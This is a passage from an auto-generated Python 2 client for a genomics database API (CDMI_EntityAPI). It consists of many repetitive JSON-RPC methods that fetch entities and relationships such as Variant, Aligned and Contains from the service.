if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_TreeAttribute(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_TreeAttribute',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_TreeAttribute(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_TreeAttribute',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_TreeNodeAttribute(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_TreeNodeAttribute',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_TreeNodeAttribute(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_TreeNodeAttribute',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_TreeNodeAttribute(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_TreeNodeAttribute',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_entity_Variant(self, ids, fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_entity_Variant',
'params': [ids, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def query_entity_Variant(self, qry, fields):
arg_hash = {'method': 'CDMI_EntityAPI.query_entity_Variant',
'params': [qry, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def all_entities_Variant(self, start, count, fields):
arg_hash = {'method': 'CDMI_EntityAPI.all_entities_Variant',
'params': [start, count, fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
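    # Usage sketch (editorial; assumes the client class is constructed with
    # a service URL as elsewhere in this module -- the URL below is only a
    # placeholder):
    #
    #     cdmi = CDMI_EntityAPI('http://example.org/services/cdmi_api')
    #     variants = cdmi.all_entities_Variant(0, 100, ['id'])
    #     print variants
    #
    # The all_entities_* methods page through an entity table (start offset
    # plus count), get_entity_* looks up specific ids, and query_entity_*
    # filters on field values; all three return the first element of the
    # server's 'result' list.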
def get_relationship_AffectsLevelOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AffectsLevelOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAffectedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAffectedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Aligned(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Aligned',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasAlignedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasAlignedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssertsFunctionFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssertsFunctionFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasAssertedFunctionFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasAssertedFunctionFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AssociationFeature(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AssociationFeature',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_FeatureInteractsIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_FeatureInteractsIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_CompoundMeasuredBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_CompoundMeasuredBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_MeasuresCompound(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_MeasuresCompound',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Concerns(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Concerns',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsATopicOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsATopicOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ConsistsOfCompounds(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ConsistsOfCompounds',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Contains(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Contains',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsContainedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsContainedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ContainsAlignedDNA(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ContainsAlignedDNA',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAlignedDNAComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAlignedDNAComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ContainsAlignedProtein(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ContainsAlignedProtein',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsAlignedProteinComponentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsAlignedProteinComponentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_ContainsExperimentalUnit(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_ContainsExperimentalUnit',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_GroupedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_GroupedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Controls(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Controls',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsControlledUsing(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsControlledUsing',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
            raise URLError('Received bad response code from server: ' +
                           str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DefaultControlSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DefaultControlSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
